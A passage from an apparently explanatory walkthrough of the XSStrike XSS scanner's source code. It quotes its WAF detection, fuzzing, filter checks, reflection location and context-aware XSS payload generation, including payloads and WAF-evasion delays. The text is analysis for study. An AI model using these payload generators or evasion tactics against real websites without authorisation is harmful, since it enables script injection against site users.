Reading the XSStrike Source Code

XSStrike

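XSStrike is an XSS scanning tool.

GitHub: https://github.com/UltimateHackers/XSStrike

Official site: https://xsstrike.tk/

Its main features:

WAF detection and bypass
Automatic PoC generation
Support for GET and POST requests
Support for Cookie/HTTP authentication
Hidden parameter discovery
Blind XSS brute forcing

The source analysis below is organized around these features.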

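Source Code Analysis

Program Initialization

After importing the required packages, XSStrike performs a series of initialization steps. In order:

Define the color codes: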

# Just some colors and shit
white = '\033[1;97m'
...

Initialize the browser object br and configure it:

br = mechanize.Browser() # Just shortening the calling function
br.set_handle_robots(False) # Don't follow robots.txt
br.set_handle_equiv(True) # I don't know what it does, but its some good shit
br.set_handle_redirect(True) # Follow redirects
br.set_handle_referer(True) # Include referrer
br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1'),
('Accept-Encoding', 'deflate'), ('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q

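The key settings:

set_handle_robots(False): do not obey robots.txt
set_handle_equiv(True): the author's comment admits he does not know what this does :) In mechanize it makes the browser treat HTML http-equiv meta headers like HTTP headers
set_handle_redirect(True): follow redirects
set_handle_referer(True): add a Referer header to each request

The next part initializes some variables and functions: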

xsschecker = 'd3v' # A non malicious string to check for reflections and stuff
paranames = [] # list for storing parameter names
paravalues = [] # list for storing parameter values

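xsschecker is set to d3v and is used to detect XSS reflections. The string d3v is harmless, so it can be used to find where input is echoed in the page. A real payload is not used at this stage because a WAF might filter the sensitive keywords in it and make the detection fail; XSS scanners therefore usually verify reflection with a harmless string first and adjust the payload step by step afterwards. paranames and paravalues store the parameter names and parameter values respectively.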

CURRENTLY_OPEN_TAGS = [] # Used by HTML parser
OPEN_EMPTY_TAG = "" # to store context i.e. <input attr=$reflection> then input will be open tag
blacklist = ['html','body','br'] # These tags are normally empty thats why we are ignoring them
whitelist = ['input', 'textarea'] # These tags are the top priority to break out from        
NUM_REFLECTIONS = 0 # Number of reflections
OCCURENCE_NUM = 0 # Occurence number
OCCURENCE_PARSED = 0 # Occurence parsed by the parser
occur_number = []
occur_location = []
delay = 0

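Because html/body/br tags are left unclosed on many pages, they are put on the blacklist. input/textarea are both input and output points and are likely places for XSS, so they get priority and go into the whitelist.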

tags = ['sVg', 'iMg', 'bOdY', 'd3v', 'deTails'] # HTML Tags
event_handlers = { # Event handlers and the name of tags which can be used with them
'oNeRror': ['sVg', 'iMg', 'viDeo'],
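# ... (remaining entries omitted)
}
functions = [ # JavaScript functions to get a popup
'[8].find(confirm)', # ... (remaining entries omitted)
]
# "Not so malicious" payloads for fuzzing
fuzzes = ['<z oNxXx=yyy>', # ... (remaining entries omitted)
]
payloads = [ # Payloads for blind xss and simple bruteforcing
'\'"</Script><Html Onmouseover=(confirm)()//',
# ... (remaining entries omitted)
]
blind_params = ['redirect', # ... (remaining entries omitted)
]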

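These define the payloads used later in the fuzz/scan stages.

XSStrike then checks for updates, after which execution reaches input() at line 781, where the actual scanning starts.

input() - Scan Entry Point

input() is the starting point of a scan; it sets the target and its parameters. The source: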

def input():
    target = raw_input('%s Enter a url: ' % que)
    if 'http' in target: # if the target has http in it, do nothing
        pass
    else:
        try:
            br.open('http://%s' % target) # Makes request to the target with http schema
            target = 'http://%s' % target
        except: # if it fails, maybe the target uses https schema
            target = 'https://%s' % target
    try:
        br.open(target) # Makes request to the target
    except Exception as e: # if it fails, the target is unreachable
        if 'ssl' in str(e).lower():
            print '%s Unable to verify target\'s SSL certificate.' % bad
            quit()
        else:
            print '%s Unable to connect to the target.' % bad
            quit()

It reads a URL, checks whether the URL contains a scheme, and tests the connection to the resulting URL.
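
The check 'http' in target is loose: a scheme-less target such as a.b/?r=http://x also contains "http". A minimal Python 3 sketch of a stricter variant follows; it is not the author's code, and with_scheme and can_connect are hypothetical names, with can_connect standing in for a successful br.open().

```python
def with_scheme(target, can_connect):
    """Return target with a scheme, preferring http and falling back to https.

    can_connect(url) -> bool is a hypothetical stand-in for br.open(url)
    succeeding without an exception.
    """
    if target.startswith(("http://", "https://")):
        return target  # a scheme is already present at the start
    candidate = "http://" + target
    return candidate if can_connect(candidate) else "https://" + target


# Usage with fake connectivity checks
print(with_scheme("example.com", lambda url: True))
print(with_scheme("example.com", lambda url: False))
```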

cookie = raw_input('%s Enter cookie (if any): ' % que)
if cookie != '':
    br.addheaders.append(('Cookie', cookie))

It then reads a cookie, which is sent with later requests for authentication.

if '=' in target: # A url with GET request must have a = so...
    GET, POST = True, False
    param_data = ''
    param_parser(target, param_data, GET, POST)
    initiator(url, GET, POST)
else:
    choice = raw_input('%s Does it use POST method? [Y/n] ' % que).lower()
    if choice == 'n':
        GET, POST = True, False
        initiator(target, GET, POST)
    else:
        GET, POST = False, True
        param_data = raw_input('%s Enter POST data: ' % que)
        param_parser(target, param_data, GET, POST)
        initiator(url, GET, POST)

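Next, input() extracts the parameters from the given URL. If the URL contains a query string, i.e. contains =, the request is treated as GET. Otherwise the user is asked whether the target uses POST and, if so, enters the POST data by hand. In the GET-with-query and POST cases, param_parser(target, param_data, GET, POST) is called to set up the parameters. param_parser() is defined at line 626; its source is below. It appends each parameter name and value to the paranames and paravalues lists defined earlier.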

def param_parser(target, param_data, GET, POST):
    global url
    if POST:
        target = target + '?' + param_data
    parsed_url = urlparse(target)
    url = parsed_url.scheme+'://'+parsed_url.netloc+parsed_url.path
    parameters = parse_qs(parsed_url.query, keep_blank_values=True)
    for para in parameters:
        for i in parameters[para]:
            paranames.append(para)
            paravalues.append(i)
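
For readers on Python 3, the same parsing idea can be sketched with urllib.parse. This is an illustration, not the author's code: split_params is a hypothetical name, and it returns its results instead of filling the global url, paranames and paravalues.

```python
from urllib.parse import urlparse, parse_qs


def split_params(target, post_data=""):
    """Return (base_url, names, values) for a GET URL or a URL plus POST body."""
    if post_data:
        # Same trick as the original: treat the POST body as a query string
        target = target + "?" + post_data
    parsed = urlparse(target)
    base_url = parsed.scheme + "://" + parsed.netloc + parsed.path
    names, values = [], []
    # keep_blank_values=True keeps parameters such as "q=" that have no value
    for name, vals in parse_qs(parsed.query, keep_blank_values=True).items():
        for value in vals:
            names.append(name)
            values.append(value)
    return base_url, names, values


base, names, values = split_params("http://127.0.0.1/?input_r=f&input_d=e")
print(base, names, values)
```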

Finally, input() calls initiator() to run the scan.

initiator() - XSS Scan

initiator() is defined at line 642. Its overall structure:

def initiator(url, GET, POST):
    choice = raw_input('%s Would you like to look for hidden parameters? [y/N] ' % que)
    if choice == 'y':
        paramfinder(url, GET, POST)
    if len(paranames) == 0:
        print '%s No parameters to test.' % bad
        quit()
    else:
        if GET: ...
        elif POST: ...
    
    if len(occur_number) == 0 and GET: ...
    elif len(occur_number) == 0 and POST: ...

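Step 1

It first asks whether to look for hidden parameters; if so, it calls paramfinder(url, GET, POST). See the section paramfinder() - Finding Hidden Parameters.

Step 2

After confirming that paranames is not empty, it runs a first scan whose details depend on the request method. GET and POST are handled in much the same way, which can be summarized by the following code: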

if GET:
    GET, POST = True, False
    WAF_detector(url, '?'+paranames[0]+'='+xsschecker, GET, POST)
    current_param = 0
    for param_name in paranames:
        print ('%s-%s' % (red, end)) * 50
        print '%s Testing parameter %s%s%s' % (run, green, param_name, end)
        
        paranames_combined = []
        for param_name, param_value in izip(paranames, paravalues):
            paranames_combined.append('&' + param_name + '=' + param_value)
        
        new_param_data = []
        current = '&' + paranames[current_param] + '='
        for i in paranames_combined:
            if current in i:
                pass
            else:
                new_param_data.append(i)
        
        param_data = '?' + paranames[current_param] + '=' + xsschecker + ''.join(new_param_data) # GET
        param_data = paranames[current_param] + '=' + xsschecker + ''.join(new_param_data) # POST
        if WAF:
            choice = raw_input('%s A WAF is active on the target. Would you like to delay requests to evade suspicion? [y/N] ' % que)
            if choice == 'y':
                delay = 6
            else:
                delay = 0
            fuzzer(url, param_data, GET, POST) #Launches fuzzer aka Ninja
            quit()
        filter_checker(url, param_data, GET, POST) # Launches filter checker
        locater(url, param_data, GET, POST) # Launches locater
        inject(url, param_data, GET, POST) # Launches injector
        del occur_number[:]
        del occur_location[:]
        current_param = current_param + 1

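In this flow, WAF_detector() is first called with paranames[0] to check for a WAF; WAF_detector() is covered later. Then, for each entry in paranames, the parameter under test is paranames[current_param], while the remaining parameters are kept with their values in new_param_data. param_data is then built in GET or POST form.

For example, take the URL http://127.0.0.1/?input_r=f&input_d=e, which has two parameters, input_r and input_d. When input_d is under test, its value becomes xsschecker, i.e. d3v, and new_param_data is &input_r=f. The resulting initial param_data is ?input_d=d3v&input_r=f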
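
The construction of param_data can be reproduced with a small Python 3 sketch. build_param_data is a hypothetical helper, and it compares parameter names directly, whereas the quoted code filters by checking whether '&name=' occurs as a substring.

```python
XSSCHECKER = "d3v"  # same probe value as the original xsschecker


def build_param_data(names, values, index, get=True):
    """Put the probe into names[index] and keep every other parameter as-is."""
    current = names[index]
    others = [
        "&" + name + "=" + value
        for name, value in zip(names, values)
        if name != current
    ]
    data = current + "=" + XSSCHECKER + "".join(others)
    # GET data is appended to the URL, so it needs the leading '?'
    return "?" + data if get else data


print(build_param_data(["input_r", "input_d"], ["f", "e"], 1))
```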

Depending on whether a WAF was detected, the program takes one of two branches.

When a WAF is present

This is line 671 of the source:

if WAF:
    choice = raw_input('%s A WAF is active on the target. Would you like to delay requests to evade suspicion? [y/N] ' % que)
    if choice == 'y':
        delay = 6
    else:
        delay = 0
    fuzzer(url, param_data, GET, POST) #Launches fuzzer aka Ninja
    quit()

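Because a WAF was detected, it asks whether to slow down requests to avoid being banned. It then calls fuzzer() to fuzz with XSS payloads; fuzzer() is covered later.

When no WAF is present

Line 681 of the source: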

filter_checker(url, param_data, GET, POST) # Launches filter checker
locater(url, param_data, GET, POST) # Launches locater
inject(url, param_data, GET, POST) # Launches injector
del occur_number[:]
del occur_location[:]
current_param = current_param + 1

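First, filter_checker(url, param_data, GET, POST) performs a basic filter check. If the test string triggers XSS directly, the program can exit right there; otherwise it checks further. filter_checker() is analyzed later.

Next, locater(url, param_data, GET, POST) locates every reflection of the parameter in the page and stores the results in occur_number and occur_location. locater() is analyzed later.

Finally, inject(url, param_data, GET, POST) does the actual XSS scanning/fuzzing. inject() is analyzed later.

Once the current parameter is done, occur_number and occur_location are cleared so they can hold the reflection IDs and locations of the next parameter. current_param = current_param + 1 moves on to the next parameter.

Step 3

After the automated detection in step 2, this step is manual and runs only when occur_number is empty. For GET it fills in each payload, opens the URL in a browser, and leaves confirmation to the user; for POST it only prints the payloads: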

if len(occur_number) == 0 and GET:
    print '%s Executing project HULK for blind XSS Detection' % info
    for payload in payloads:
        param_data = param_data.replace(xsschecker, payload) # Replaces the xsschecker with payload
        print '%s Payload: %s' % (info, payload)
        webbrowser.open(url + param_data) # Opens the "injected" URL in browser
        next = raw_input('%s Press enter to execute next payload' % que)
elif len(occur_number) == 0 and POST:
    choice = raw_input('%s Would you like to generate some payloads for blind XSS? [Y/n] ' % que).lower()
    if choice == 'n':
        quit()
    else:
        for payload in payloads: # We will print the payloads from the payloads list
            print '%s  %s' % (info, payload)
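
Read literally, the GET loop above reassigns param_data on every pass, so once the first payload has replaced xsschecker there is nothing left for later replace() calls to substitute. A Python 3 sketch of one way around this, assuming the intent is to try every payload, is to substitute into the untouched template each time. blind_urls and demo_payloads are hypothetical names.

```python
XSSCHECKER = "d3v"


def blind_urls(url, param_data, payloads):
    """Yield one URL per payload, always starting from the untouched template."""
    for payload in payloads:
        # param_data itself is never reassigned, so the probe is still there
        yield url + param_data.replace(XSSCHECKER, payload)


# Hypothetical payloads, for illustration only
demo_payloads = ["<svg/onload=confirm()>", "'\"><img src=x onerror=confirm()>"]
urls = list(blind_urls("http://127.0.0.1/", "?q=d3v", demo_payloads))
for u in urls:
    print(u)
```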

paramfinder() - Finding Hidden Parameters

paramfinder() is defined at line 439. The source:

def paramfinder(url, GET, POST):
    response = br.open(url).read()
    matches = re.findall(r'<input[^<]*name=\'[^<]*\'*>|<input[^<]*name="[^<]*"*>', response)
    for match in matches: ...
    progress = 0
    for param in blind_params:
        progress = progress + 1
        sys.stdout.write('\r%s Parameters checked: %i/%i' % (run, progress, len(blind_params)))
        sys.stdout.flush()
        if param not in paranames:
            if GET:
                response = br.open(url + '?' + param + '=' + xsschecker).read()
            if POST:
                response = br.open(url, param + '=' + xsschecker).read()
            if '\'%s\'' % xsschecker in response or '"%s"' % xsschecker in response or ' %s ' % xsschecker in response:
                print '%s Valid parameter found : %s%s%s' % (good, green, param, end)
                paranames.append(param)
                paravalues.append('')

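paramfinder() first requests the URL, then uses a regular expression on the returned HTML to extract every candidate input and adds them to blind_params.

It then builds a request for each candidate according to the method, GET or POST. In both cases the parameter name comes from blind_params (the predefined list plus the names extracted from the page), and the parameter value is the xsschecker string initialized at startup.

Finally, paramfinder() decides whether a hidden parameter exists by checking whether the response contains the xsschecker value (in single quotes, in double quotes, or surrounded by spaces). Parameters found this way are appended to paranames and paravalues for further scanning.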
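
The two building blocks of paramfinder(), name extraction and the reflection check, can be tried offline with a Python 3 sketch. input_names and is_reflected are hypothetical helpers, and the regular expression is a simplified one written for this example, not the pattern from the source.

```python
import re

XSSCHECKER = "d3v"


def input_names(html):
    """Collect the name="..." / name='...' values of <input> tags."""
    return re.findall(r"""<input[^>]*\bname=["']([^"']+)["']""", html)


def is_reflected(response):
    """Same three patterns as the quoted check: 'd3v', "d3v", or d3v between spaces."""
    patterns = ("'%s'" % XSSCHECKER, '"%s"' % XSSCHECKER, " %s " % XSSCHECKER)
    return any(p in response for p in patterns)


page = '<form><input type="text" name="q"><input name=\'token\' type=hidden></form>'
print(input_names(page))
print(is_reflected('<input value="d3v">'))
```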

WAF_detector() - WAF Detection

WAF_detector() is defined at line 171. It sends a request and uses the HTTP response code to decide whether a WAF is present. The source:

def WAF_detector(url, param_data, GET, POST):
    global WAF
    WAF = False
    noise = quote_plus('<script>confirm()</script>') #a payload which is noisy enough to provoke the WAF
    fuzz = param_data.replace(xsschecker, noise) #Replaces xsschecker in param_data with noise
    try:
        sleep(delay) # Pausing the program. Default = 0 sec. In case of WAF = 6 sec.
        if GET:
            response = br.open(url + fuzz) # Opens the noise injected payload
        else:
            response = br.open(url, fuzz) # Opens the noise injected payload
        print '%s WAF Status: Offline' % good
    except Exception as e: # if an error occurs, catch the error
        e = str(e) # convert the error to a string
        # Here, we are looking for HTTP response codes in the error to fingerprint the WAF
        if '406' in e or '501' in e: # if the http response code is 406/501
            WAF_Name = 'Mod_Security'
            WAF = True
        elif '999' in e: # if the http response code is 999
            WAF_Name = 'WebKnight'
            WAF = True
        elif '419' in e: # if the http response code is 419
            WAF_Name = 'F5 BIG IP'
            WAF = True
        elif '403' in e: # if the http response code is 403
            WAF_Name = 'Unknown'
            WAF = True
        else:
            print '%s WAF Status: Offline' % good
        if WAF:
            print '%s WAF Detected: %s' % (bad, WAF_Name)

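It is called at line 652, inside initiator(): WAF_detector(url, '?'+paranames[0]+'='+xsschecker, GET, POST).

The function replaces the harmless xsschecker with the most common payload, <script>confirm()</script>, so if a WAF is present it will most likely be triggered and thus detected. The WAF is then fingerprinted according to the following table:

Status code	WAF name
406 or 501	Mod_Security
999	WebKnight
419	F5 BIG IP
403	Unknown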
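
The fingerprinting step amounts to a lookup from status code to WAF name. The Python 3 sketch below assumes the status code is available as an integer; the quoted code instead searches for the digits anywhere in the exception text, which could also match unrelated numbers in the message. WAF_BY_STATUS and fingerprint_waf are hypothetical names.

```python
# Status code -> WAF name, transcribed from the checks in WAF_detector()
WAF_BY_STATUS = {
    406: "Mod_Security",
    501: "Mod_Security",
    999: "WebKnight",
    419: "F5 BIG IP",
    403: "Unknown",
}


def fingerprint_waf(status_code):
    """Return the WAF name for a blocking status code, or None if none matches."""
    return WAF_BY_STATUS.get(status_code)


print(fingerprint_waf(406))
print(fingerprint_waf(200))
```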

fuzzer() - Fuzzing the WAF

fuzzer() is defined at line 134. The source:

def fuzzer(url, param_data, GET, POST):
    result = [] # Result of fuzzing
    progress = 0 # Variable for recording the progress of fuzzing
    for i in fuzzes:
        progress = progress + 1
        sleep(delay) # Pausing the program. Default = 0 sec. In case of WAF = 6 sec.
        sys.stdout.write('\r%s Fuzz Sent: %i/%i' % (run, progress, len(fuzzes)))
        sys.stdout.flush()
        try:
            fuzzy = quote_plus(i) # URL encoding the payload
            param_data_injected = param_data.replace(xsschecker, fuzzy) # Replcaing the xsschecker with fuzz
            if GET: # GET parameter
                response = br.open(url + param_data_injected).read() # makes a request to example.com/search.php?q=<fuzz>
            else: # POST parameter
                response = br.open(url, param_data_injected).read() # Seperating the "param_data_injected" with comma because its POST data
            if i in response: # if fuzz string is reflected in the response / source code
                result.append({
                'result' : '%sWorks%s' % (green, end),
                'fuzz' : i})
            else: # if the fuzz string was not reflected in the response completely
                result.append({
                    'result' : '%sFiltered%s' % (yellow, end),
                    'fuzz' : i})
        except: # if the server returned an error (Maybe WAF blocked it)
            result.append({
                'result' : '%sBlocked%s'  % (red, end),
                'fuzz' : i})
    table = PrettyTable(['Fuzz', 'Response']) # Creates a table with two columns
    for value in result:
        table.add_row([value['fuzz'], value['result']]) # Adds the value of fuzz and result to the columns
    print '\n', table

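fuzzes was defined during initialization: fuzzes = ['<z oNxXx=yyy>', '<z xXx=yyy>'.......]. fuzzer() iterates over fuzzes, substitutes each one into the parameter under test, and inspects the returned HTML. If the fuzz string appears in the page the result is Works; if it does not, the result is Filtered; if the request raises an error, it is Blocked. The results are printed with PrettyTable.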
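
The three outcomes can be isolated in a Python 3 sketch that needs no network. classify_fuzz is a hypothetical helper, and fake_send is a made-up stand-in for br.open(...).read() that blocks script tags and escapes '<' in strings containing '='.

```python
def classify_fuzz(fuzz_string, send):
    """Classify one fuzz string; send(s) returns the response body or raises."""
    try:
        body = send(fuzz_string)
    except Exception:
        return "Blocked"  # the request failed, possibly stopped by the WAF
    return "Works" if fuzz_string in body else "Filtered"


def fake_send(s):
    """Hypothetical target used only for this demonstration."""
    if "<script" in s.lower():
        raise IOError("HTTP Error 403: Forbidden")
    if "=" in s:
        return "<p>" + s.replace("<", "&lt;") + "</p>"  # escapes '<'
    return "<p>" + s + "</p>"


for probe in ["<z>", "<z oNxXx=yyy>", "<script>x</script>"]:
    print(probe, classify_fuzz(probe, fake_send))
```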

filter_checker() - Filter Check

filter_checker() is defined at line 207:

def filter_checker(url, param_data, GET, POST):
    strength = '' # A variable for containing strength of the filter
    # Injecting a malicious payload first by replacing xsschecker with our payload
    try:
        low_string = param_data.replace(xsschecker, quote_plus('<svg/onload=(confirm)()>'))
        sleep(delay) # Pausing the program. Default = 0 sec. In case of WAF = 6 sec.
        if GET:
            low_request = br.open(url + low_string).read()
        else:
            low_request = br.open(url, low_string).read()
        if '<svg/onload=(confirm)()>' in low_request: ...
        else: ...
    except Exception as e:
        try:
            print '%s Target doesn\'t seem to respond properly. Error Code: %s' % (bad, re.search(r'\d\d\d', str(e)).group())
        except:
            print '%s Target doesn\'t seem to respond properly.' % bad

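The filter check uses <svg/onload=(confirm)()> directly. The variable strength records how strong the filter is. The returned HTML then determines the next steps.

If there is no filtering, i.e. the returned HTML contains <svg/onload=(confirm)()> verbatim, the filter strength is reported as Low or None, and <svg/onload=(confirm)()> itself works as a payload. The user chooses whether to continue scanning or to open the XSS page built from this payload right away. The corresponding code: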

if '<svg/onload=(confirm)()>' in low_request: # If payload was reflected in response
    print "%s Filter Strength : %sLow or None%s" % (good, green, end)
    print '%s Payload: <svg/onload=(confirm)()>' % good
    print '%s Efficiency: 100%%' % good
    choice = raw_input('%s A payload with 100%% efficiency was found. Continue scanning? [y/N] ' % que).lower()
    if choice == 'y':
        pass
    else:
        if GET:
            webbrowser.open(url+param_data.strip(xsschecker)+'<svg/onload=(confirm)()>')
            quit()
    strength = 'low' # As a malicious payload was not filtered, the filter is weak

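If there is filtering, i.e. <svg/onload=(confirm)()> cannot be found in the returned page (it may have been removed entirely, had keywords stripped, or had sensitive characters escaped), a milder probe, <zz//onxx=yy>, is sent in a new request. If the probe shows up in the response HTML (the quoted code looks for <zz onxx=yy>), the filter strength is medium; otherwise it is high. The code: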

else: # If malicious payload was filtered (was not in the response)
    # Now we will use a less malicious payload
    medium_string = param_data.replace(xsschecker, quote_plus('<zz//onxx=yy>'))
    sleep(delay) # Pausing the program. Default = 0 sec. In case of WAF = 6 sec.
    if GET:
        medium_request = br.open(url + medium_string).read()
    else:
        medium_request = br.open(url + medium_string).read()
    if '<zz onxx=yy>' in medium_request:
        print '%s Filter Strength : %sMedium%s' % (info, yellow, end)
        strength = 'medium'
    else: #Printing high since result was not medium/low
        print '%s Filter Strength : %sHigh%s' % (bad, red, end)
        strength = 'high'
    return strength
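
The low/medium/high decision can be condensed into a Python 3 sketch. filter_strength and its send callable are hypothetical; the probe strings and the expected string are copied from the quoted code, including the fact that the medium check looks for a slightly different string than the one sent.

```python
LOW_PROBE = "<svg/onload=(confirm)()>"
MEDIUM_PROBE = "<zz//onxx=yy>"
MEDIUM_EXPECTED = "<zz onxx=yy>"  # the string the quoted code searches for


def filter_strength(send):
    """send(payload) returns the response body for a request carrying payload."""
    if LOW_PROBE in send(LOW_PROBE):
        return "low"
    # The milder probe is only sent when the first one was filtered
    if MEDIUM_EXPECTED in send(MEDIUM_PROBE):
        return "medium"
    return "high"


print(filter_strength(lambda p: p))   # echoes everything back
print(filter_strength(lambda p: ""))  # reflects nothing
```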

locater() - Locating Reflections

locater() is defined at line 254:

def locater(url, param_data, GET, POST):
    init_resp = make_request(url, param_data, GET, POST) # Makes request to the target
    if(xsschecker in init_resp.lower()): # if the xsschecker is found in the response
        global NUM_REFLECTIONS # The number of reflections of xsschecker in the response
        NUM_REFLECTIONS = init_resp.lower().count(xsschecker.lower()) # Counts number of time d3v got reflected in webpage
        print '%s Number of reflections found: %i' % (info, NUM_REFLECTIONS)
        for i in range(NUM_REFLECTIONS):
            global OCCURENCE_NUM
            OCCURENCE_NUM = i+1
            scan_occurence(init_resp) # Calls out a function to find context/location of xsschecker 
            # Reset globals for next instance
            global ALLOWED_CHARS, IN_SINGLE_QUOTES, IN_DOUBLE_QUOTES, IN_TAG_ATTRIBUTE, IN_TAG_NON_ATTRIBUTE, IN_SCRIPT_TAG, CURRENTLY_OPEN_TAGS, OPEN_TAGS, OCCURENCE_PARSED, OPEN_EMPTY_TAG
            ALLOWED_CHARS, CURRENTLY_OPEN_TAGS, OPEN_TAGS = [], [], []
            IN_SINGLE_QUOTES, IN_DOUBLE_QUOTES, IN_TAG_ATTRIBUTE, IN_TAG_NON_ATTRIBUTE, IN_SCRIPT_TAG = False, False, False, False, False
            OCCURENCE_PARSED = 0
            OPEN_EMPTY_TAG = ""
    else: #Launched hulk if no reflection is found. Hulk Smash!
        print '%s No reflection found.' % bad

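This locates the reflections. Since xsschecker is d3v, counting how many times that value appears in the HTML gives NUM_REFLECTIONS. OCCURENCE_NUM identifies each reflection in turn, and scan_occurence() is run for each one. That function is defined at line 273: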

def scan_occurence(init_resp):
    # Parses the response to locate the position/context of xsschecker i.e. d3v
    location = html_parse(init_resp) # Calling out the parser function
    if location in ('script', 'html_data', 'start_end_tag_attr', 'attr'):
        occur_number.append(OCCURENCE_NUM)
        occur_location.append(location)
    # We are treating the comment context differentally because if a payload is reflected
    # in comment, it won't execute. So will we test the comment context first
    elif location == 'comment':
        occur_number.insert(0, OCCURENCE_NUM) # inserting the occurence_num in start of the list
        occur_location.insert(0, location) # same as above
    else:
        pass

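html_parse(init_resp) is the author's own HTML parsing function. Given OCCURENCE_NUM, it finds the specific reflection and determines the context it sits in. As the author's comment explains, a reflection inside a comment is inserted at the front of occur_number and occur_location, because code inside a comment normally does not execute, so that context is tested first. In the other cases (script/html_data/start_end_tag_attr/attr), entries are appended in order. occur_number holds the reflection's index and occur_location holds its context.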
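
The ordering rule is easy to check in isolation. The Python 3 sketch below takes the contexts as a ready-made list instead of calling html_parse(), and order_occurrences is a hypothetical name.

```python
def order_occurrences(locations):
    """locations[i] is the context of reflection i+1; returns (numbers, contexts)."""
    numbers, contexts = [], []
    for num, loc in enumerate(locations, start=1):
        if loc in ("script", "html_data", "start_end_tag_attr", "attr"):
            numbers.append(num)
            contexts.append(loc)
        elif loc == "comment":
            # Comment reflections go to the front so they are tested first
            numbers.insert(0, num)
            contexts.insert(0, loc)
        # Any other value (e.g. an empty string) is ignored
    return numbers, contexts


print(order_occurrences(["html_data", "comment", "attr", ""]))
```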

inject() - Payload Injection

inject() is defined at line 468. It is the core of the XSS attack logic and the code is long; its overall structure:

def inject(url, param_data, GET, POST):
    special = ''
    l_filling = ''
    e_fillings = ['%0a','%09','%0d','+'] # "Things" to use between event handler and = or between function and =
    fillings = ['%0c', '%0a','%09','%0d','/+/'] # "Things" to use instead of space
    
    for OCCURENCE_NUM, location in izip(occur_number, occur_location):
        print '\n%s Testing reflection no. %s ' % (run, OCCURENCE_NUM)
        allowed = []
        if test_param_check('k"k', 'k"k', OCCURENCE_NUM, url, param_data, GET, POST, action='nope'): 
            ...
        elif test_param_check('k"k', 'k&quot;k', OCCURENCE_NUM, url, param_data, GET, POST, action='nope'):
            ...
        else:
            ...
        if test_param_check('k\'k', 'k\'k', OCCURENCE_NUM, url, param_data, GET, POST, action='nope'):
            ...
        else:
            ...
        if test_param_check('<lol>', '<lol>', OCCURENCE_NUM, url, param_data, GET, POST, action='nope'):
            ...
        else:
            ... 
        if location == 'comment':
            ...
        elif location == 'script':
            ...
        elif location == 'html_data':
            ...
        elif location == 'start_end_tag_attr' or location == 'attr':
            ...

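It first defines four variables, special, l_filling, e_fillings and fillings, which hold key characters used later to build payloads. It then iterates over occur_number and occur_location and tests each reflection.

Testing has two parts.

The first part uses test_param_check() to probe special characters and see whether they are encoded:

Double quote (")
Single quote (')
Angle brackets (<>)
How test_param_check() works is covered later.

The second part runs different tests depending on the context of the current reflection.

When the reflection is inside a comment: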

if location == 'comment':
    print '%s Trying to break out of %sHTML Comment%s context.' % (run, green, end)
    prefix = '-->'
    suffixes = ['', '<!--']
    progress = 1
    for suffix in suffixes:
        for tag in tags:
            for event_handler, compatible in event_handlers.items():
                if tag in compatible:
                    for filling, function, e_filling in izip(fillings, functions, e_fillings):
                        progress = progress + 1
                        sys.stdout.write('\r%s Payloads tried: %i' % (run, progress))
                        sys.stdout.flush()
                        if event_handler == 'oNeRror':
                            payload = '%s<%s%s%s%s%s%s%s%s=%s%s%s>%s' % (prefix, tag, filling, 'sRc=', e_filling, '=', e_filling, event_handler, e_filling, e_filling, function, l_filling, suffix)
                        else:
                            payload = '%s<%s%s%s%s%s=%s%s%s>%s' % (prefix, tag, filling, special, event_handler, e_filling, e_filling, function, l_filling, suffix)
                        test_param_check(quote_plus(payload), payload, OCCURENCE_NUM, url, param_data, GET, POST, action='do')

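To close the comment, the payload prefix must be -->; the suffix can be empty or <!--, which reopens a comment so that the original closing --> is absorbed. It then combines the payload building blocks defined earlier into payloads and tests each with test_param_check().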
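
The nested loops for the comment context can be reproduced as a Python 3 generator. This sketch covers only the general (non-oNeRror) format string, and because the full event_handlers dictionary is omitted in the article, the 'oNloAd' entry used in the demo is a hypothetical example. comment_payloads is a hypothetical name.

```python
def comment_payloads(tags, event_handlers, fillings, functions, e_fillings):
    """Yield comment-breaking payloads in the same order as the quoted loops."""
    prefix, special, l_filling = "-->", "", ""
    for suffix in ("", "<!--"):
        for tag in tags:
            for handler, compatible in event_handlers.items():
                if tag not in compatible:
                    continue
                # zip stops at the shortest list, like izip in the original
                for filling, function, e_filling in zip(fillings, functions, e_fillings):
                    yield "".join([
                        prefix, "<", tag, filling, special, handler,
                        e_filling, "=", e_filling, function, l_filling, ">", suffix,
                    ])


demo = list(comment_payloads(
    tags=["sVg"],
    event_handlers={"oNloAd": ["sVg"]},  # hypothetical entry
    fillings=["%0c", "%0a"],
    functions=["[8].find(confirm)"],
    e_fillings=["%0a", "%09"],
))
for p in demo:
    print(p)
```

Since the three lists are zipped rather than combined as a product, the number of payloads per tag and handler is bounded by the shortest list.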

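When the reflection is inside a script tag, the candidate prefixes and suffixes are determined in the same way, payloads are generated, and test_param_check() is run.

When the reflection is in html_data, e.g. <h1>reflection</h1>, the payload has to be parsed as markup rather than plain text, which normally requires angle brackets, e.g. <h1><script>alert(1)</script></h1> or <h1><svg/onload=(confirm)()></h1>. So when angle brackets are found to be filtered, this reflection is skipped: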

if angular_allowed:
    l_than, g_than = '<', '>'
# elif entity_allowed:
#     l_than, g_than = '&lt;', '&gt;'
else:
    print '%s Angular brackets are being filtered. Unable to generate payloads.' % bad
    continue

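If they are not filtered, payloads are generated and tested with test_param_check().

When the reflection is inside an attribute, e.g. <img src=reflection>, <img src="reflection"> or <img src='reflection'>, the first concern is closing the quote. The code therefore determines whether a single quote, a double quote, or no quote needs closing, then generates payloads and tests them with test_param_check():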

elif location == 'start_end_tag_attr' or location == 'attr':
    print '%s Trying to break out of %sAttribute%s context.' % (run, green, end)
    quote = which_quote(OCCURENCE_NUM, url, param_data, GET, POST)
    
    if quote == '':
        prefix = '/>'
        suffixes = ['<"', '<\'', '<br attr\'=', '<br attr="']
    elif quote in allowed:
        # Quotes are allowed: generate payloads and test them
    elif quote not in allowed and 'entity' in allowed:
        # Note: the author commented this branch out, so it is skipped here
    else:
        print '%s Quotes are being filtered, its not possible to break out of the context.' % bad

html_parse() - HTML Parsing

html_parse() is defined at line 287:

def html_parse(init_resp):
    parser = MyHTMLParser() # initializes the parser
    location = '' # Variable for containing the location lol
    try:
        parser.feed(init_resp) # submitting the response to the parser
    except Exception as e: # Catching the exception/error
        location = str(e) # The error is actually the location. For more info, check MyHTMLParser class
    return location # Returns the location

MyHTMLParser() is a class written by the author that inherits from HTMLParser; it is defined at line 360:

class MyHTMLParser(HTMLParser):
    def handle_comment(self, data):
        global OCCURENCE_PARSED
